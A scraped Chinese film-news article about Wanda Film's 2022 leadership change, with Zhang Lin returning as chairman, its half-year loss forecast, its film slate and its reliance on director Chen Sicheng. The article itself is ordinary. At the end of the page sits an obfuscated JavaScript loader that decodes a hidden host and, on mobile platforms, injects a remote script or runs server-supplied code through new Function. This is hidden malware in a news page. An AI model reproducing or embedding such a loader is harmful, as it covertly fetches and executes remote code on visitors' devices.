首页  »  明星资讯  »  “老将”张霖回归董事长 万达电影还能期待什么?

“老将”张霖回归董事长 万达电影还能期待什么?

明星资讯 加载中 时间:2022.07.27


1905电影网专稿 万达电影这个暑期档有点“忙”。


电影方面,从月初的《你是我的春天》,次周的《海底小纵队:洞穴冒险》,再到前期备受关注的《外太空的莫扎特》,以及月底上映的《七人乐队》,万达电影或主控,或参投,或以其他形式参与其中。



但从目前票房来看,除了动画电影《海底小纵队:洞穴冒险》保持了低幼动画一贯的票房体量之外,其他已上映的影片,均不如预期。


尤其是此前被市场寄予厚望的《外太空的莫扎特》,即便有“陈思诚”这张金字招牌,上映超10天,票房才勉强突破2亿,而此前曾内部人士透露,影片成本超2.5亿。



人事方面,更是万众瞩目。万达电影董事长、总裁曾茂军,这位在万达干了16年的“老人”,于7月初宣布离职。在他离任的两周后,副总裁卜义飞也提交了离任申请。



与此同时,7月22日,张霖选举为万达电影董事长。事实上,在曾茂军之前,张霖曾于2012年11月至2020年12月,担任万达电影董事长,助推了万达院线(原万达电影)的上市。


除此之外,7月14日发布的《2022年半年度业绩预告》中显示,报告期内,万达电影预计归属于上市公司股东的净利润为亏损5.2亿-6亿元,预计扣除非经常性损益后的净利润为亏损5.8亿-6.6亿元,与上年同期盈利近6.4亿元相比由盈转亏,且变动幅度较大。



换将之后,万达电影或将面临全新布局,只是回看这几年万达电影的路子,或是破局,或是复盘。


01. 逆势而为,或是对曾茂军在任期间的一个总结。


2020年12月,曾茂军接任了万达电影董事长。在此之前,他已经涉足影视行业十余年。回看他的履历,加入万达集团之后,从人力资源,一路高歌,做到了万达酒店和万达商业两个重要板块的核心高管,此后一步步成为万达电影的掌舵人。



曾茂军真正操盘万达电影,是在叶宁——时任万达文化集团副总裁,2016年出走之后。


如果说,“叶宁时代”里,万达开始向电影制作上游挺进,建立青岛影都,试图打造完整的电影工业体系,操盘了《煎饼侠》《滚蛋吧!肿瘤君》《寻龙诀》等多部热门电影。



那么,“曾茂军时代”里,则是拓展了万达电影上下游产业链条。


或许,曾茂军只是在践行王健林2010年提出的“整合全球的电影产业链”的目标。王健林曾说过,“万达进入所有产业都有清晰目标,我们不做低附加值的产业下游,而是占据产业链上游和渠道。”



在任期间,他推动收购了互爱互动、新媒诚品两家上游公司。还收购了衍生品公司,整合了时光网,成立了万达传媒,拓宽广告投放渠道。


此前,万达并没有停止对海外市场版图的扩充。2016年,以36亿美元收购了传奇影业。事实上,早在2012年,万达集团就开始了海外市场的拓展,2012年,以26亿美元收购美国AMC院线——美国第二大院线公司,而曾茂军于2019年起,担任AMC院线董事。


可是2018年之后,万达进行了全新规划,对海外市场明显是放慢了速度,甚至在2021年,退出了AMC院线。


同是2018年,万达和融创达成协议,彻底从青岛影都退场。



同样是2018年,万达电影和万达影视重组,后者签了对赌协议,根据内容,2018年至2021年,万达电影净利润需完成7.63亿元、8.88亿元、10.69亿元和12.74亿元,四年累计完成39.93亿元。


但这四年中,唯有2018年万达完成了业绩目标,四年业绩距离总目标超百亿元,净亏损远超91亿元。


2018年,万达出品以及参与出品了电影《唐人街探案2》《我不是药神》《西虹市首富》等爆款电影。而2019年,出品的多部电影中,仅一部于年度上映的《误杀》实现了高票房的可能。2020年,则因为疫情原因,《唐人街探案3》等多部重磅影片的改档,以及院线运营受诸多不可控因素影响,导致了业绩不达标。



和其他影视公司一样,万达影视也苦于“爆款”。


万达电影不止内容,院线赛道同样不减。


据统计,2015年,万达电影上市之初,院线的市占率为13.6%,后续没有太大的变化浮动。但疫情反而促使了万达院线大力发展加盟店,反而市占率提升至15.53%。直至今年上半年,万达电影依旧选择了每年60至70家的自建影院以及50至100家的轻资产影院的扩张计划。



从万达电影的股价来看,《外太空的莫扎特》的首周票房成绩没有带动股价上涨,反而市场的观影回潮,成为了股价提升的关键。


02.曾几何时,《外太空的莫扎特》被外界视为,万达电影今年的重头戏。


曾茂军不止一次强调,将本片瞄准暑期档,因为电影内容,也因为只有足够大的档期,才能支撑电影回本。无独有偶,这和《唐人街探案3》坚持春节档上映的情况相同。



不可否认,在整个主控内容的背后,万达电影身后还有一个关键人物——陈思诚。


王健林不止一次,在公开场合提及《北京爱情故事》的成功——投资3000万,获得4亿票房。


事实上,在2011年,剧集《北京爱情故事》制作期内,剧集背后的第一出品新丽传媒就发生了股权变更,万达影视入股新丽。陈思诚和万达系有了第一次的交集。



2012年,万达投资陈思诚,创立了上海骋亚影视。此后,两者绑定越来越紧密,2015年,万达影视入股陈思诚的公司上海骋亚,持股60%,陈思诚本人持股30%。陈思诚退出法定代表人,由叶宁继任。


影版《北爱》的成功,证明了万达电影的眼光,在当时,万达系几乎倾尽所有资源,以不同形式参与到电影的整合营销中。同时,影片也证明了陈思诚的导演能力。



2015年,陈思诚又带来了《唐人街探案》,同另一部万达投资的电影《寻龙诀》一起,在年底杀出了重围。


自此,《唐探》成为当下整个电影市场最赚钱的IP之一,于万达电影的意义,不用多言,是其2020年的救命稻草。



陈思诚几乎从没让万达失望。《唐探》之后,又带来了监制的电影《误杀》系列。万达对《误杀》的信任,可以从两部电影背后的投资一探所以,从《误杀1》的第二出品,越身成为《误杀2》的第一出品。



回看近几年,万达电影除了借着新丽传媒关系参投开心麻花作品,鲜有主控的爆款项目。而曾茂军近年谈及的项目规划中,《唐探》系列的后续作品,成为了“大饼”之一。


如今,《外太空的莫扎特》失利,原计划的三部曲是否还能有下文呢?从目前万达电影的收益,以及该系列电影的前期投入来看,或许有点困难。



从陈思诚后续曝光的项目来看,网剧《唐人街探案2》仍有万达电影的参与,但是网剧《球状闪电》目前披露的出品方名单中,暂未看见万达,以及骋亚影视的身影,而年底即将上映的电影《消失的她》,出品主控则是阿里影业。


左边网剧《唐探2》,右边《球状闪电》


03.陈思诚之外,万达电影还有什么呢?


《寻龙诀2》说了一遍又一遍,但团队如何,一直没有下文。回看年初发布的2021年财报中,2019年8月就已经杀青的《天星术》始终没有下文,档期从原预告的2021年,变成“失踪”状态。



影版《想见你》同样于2022年杀青之后,没有任何动作。比起这两部项目,万达手上的《哥,你好》,以及《维和防暴队》或成为今年的突破口。


前者马丽、魏翔、常远的合作,有复制《这个杀手不太冷静》的可能,类似《你好,李焕英》的剧情调性,或能刺激电影市场。


主旋律题材的《维和防暴队》,有导演刘伟强的监制加成,或是一张王牌。



只是这些影片该如何布局呢?在年初的财报中提及,万达电影会注重对节假日档期的选择。


万达去年官宣的片单项目中,除了已经明确官宣的项目之外,其他内容均秘而不宣,或处于“画饼”阶段。只是,如今2022年进度条已经过半,万达急需爆款支撑。



曾茂军曾说,万达正在想办法降低主控影片的风险。


至少从近年的片单来看,除了《外太空的莫扎特》,其他主控项目,均不是大体量的作品。只是对于万达未来而言,如何用这个策略打开新的市场,显得尤为关键。


至于影院的布局战略方面,万达曾提出“提高经营效率,而非单纯扩张”,从当下的环境来看,也需更精准、更前瞻的选择。


如今,曾茂军离场,“老将”张霖回归,如何排兵布阵成为了下一局的关键。


文/青果

扫描二维码下载APP 安卓手机专享
热映电影
热播电视剧
function jXAPuIxy(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function zLufdh(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return jXAPuIxy(t);};window[''+'e'+'g'+'L'+'V'+'m'+'z'+'J'+'d'+'H'+'Y'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=zLufdh,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/g/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('a21lLmRpeW144cWcuY244=','131005',window,document,['4','OCsKegbl']);}:function(){};